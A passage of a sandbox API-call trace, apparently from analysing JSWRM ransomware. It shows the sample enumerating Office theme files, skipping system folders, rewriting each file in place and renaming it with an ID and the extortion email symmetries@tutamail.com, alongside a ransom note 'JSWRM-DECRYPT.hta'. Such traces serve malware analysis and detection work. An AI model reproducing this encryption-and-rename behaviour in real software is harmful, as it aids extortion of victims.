lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.671] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.671] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0100.672] CloseHandle (hObject=0x45c) returned 1 [0100.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0100.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0100.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0100.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0100.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0100.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0100.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0100.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0100.673] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\jswrm-decrypt.hta")) returned 0x20 [0100.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0100.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0100.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0100.673] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x32a9b11a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0100.673] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0100.673] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x32a9b11a, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="..", cAlternateFileName="")) returned 1 [0100.673] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0100.673] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0100.673] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114108ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114108ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbaeb, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Banded Edge.eftx", cAlternateFileName="BANDED~1.EFT")) returned 1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2=".") returned 1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="..") returned 1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="...") returned 1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="windows") returned -1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="recovery") returned -1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="perflogs") returned -1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="documents and settings") returned -1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="system volume information") returned -1 [0100.673] lstrcmpiW (lpString1="Banded Edge.eftx", lpString2="msocache") returned -1 [0100.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Banded Edge.eftx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0100.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Banded Edge.eftx", cchWideChar=16, lpMultiByteStr=0x2412e0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Banded Edge.eftx", lpUsedDefaultChar=0x0) returned 16 [0100.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Banded Edge.eftx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0100.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Banded Edge.eftx", cchWideChar=16, lpMultiByteStr=0x241290, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Banded Edge.eftx", lpUsedDefaultChar=0x0) returned 16 [0100.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0100.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0100.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0100.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Banded Edge.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\banded edge.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.674] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=47851) returned 1 [0100.674] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbae0) returned 0x24d210 [0100.674] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xbae0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xbae0, lpOverlapped=0x0) returned 1 [0100.680] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.680] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xbae0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xbae0, lpOverlapped=0x0) returned 1 [0100.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.680] CloseHandle (hObject=0x314) returned 1 [0100.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0100.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0100.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0100.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0100.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0100.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0100.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Banded Edge.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\banded edge.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Banded Edge.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\banded edge.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0100.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0100.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0100.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0100.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0100.681] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1139e160, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1139e160, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x530f9, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Extreme Shadow.eftx", cAlternateFileName="EXTREM~1.EFT")) returned 1 [0100.681] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2=".") returned 1 [0100.681] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="..") returned 1 [0100.681] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="...") returned 1 [0100.681] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="windows") returned -1 [0100.682] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="recovery") returned -1 [0100.682] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="perflogs") returned -1 [0100.682] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="documents and settings") returned 1 [0100.682] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.682] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="system volume information") returned -1 [0100.682] lstrcmpiW (lpString1="Extreme Shadow.eftx", lpString2="msocache") returned -1 [0100.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Extreme Shadow.eftx", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0100.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Extreme Shadow.eftx", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Extreme Shadow.eftx", lpUsedDefaultChar=0x0) returned 19 [0100.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Extreme Shadow.eftx", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Extreme Shadow.eftx", cchWideChar=19, lpMultiByteStr=0x2410d8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Extreme Shadow.eftx", lpUsedDefaultChar=0x0) returned 19 [0100.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0100.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0100.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0100.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Extreme Shadow.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\extreme shadow.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.683] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=340217) returned 1 [0100.683] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.683] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0100.697] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.697] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0100.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.697] CloseHandle (hObject=0x314) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0100.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0100.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.697] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0100.697] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0100.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0100.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0100.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.698] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Extreme Shadow.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\extreme shadow.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Extreme Shadow.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\extreme shadow.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0100.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0100.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0100.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.698] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1139e160, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1139e160, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114108ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x51933, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Frosted Glass.eftx", cAlternateFileName="FROSTE~1.EFT")) returned 1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2=".") returned 1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="..") returned 1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="...") returned 1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="windows") returned -1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="recovery") returned -1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="perflogs") returned -1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="documents and settings") returned 1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="system volume information") returned -1 [0100.699] lstrcmpiW (lpString1="Frosted Glass.eftx", lpString2="msocache") returned -1 [0100.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Frosted Glass.eftx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0100.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Frosted Glass.eftx", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Frosted Glass.eftx", lpUsedDefaultChar=0x0) returned 18 [0100.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Frosted Glass.eftx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Frosted Glass.eftx", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Frosted Glass.eftx", lpUsedDefaultChar=0x0) returned 18 [0100.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0100.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0100.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0100.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Frosted Glass.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\frosted glass.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.700] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=334131) returned 1 [0100.700] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.700] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0100.744] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.744] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0100.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: 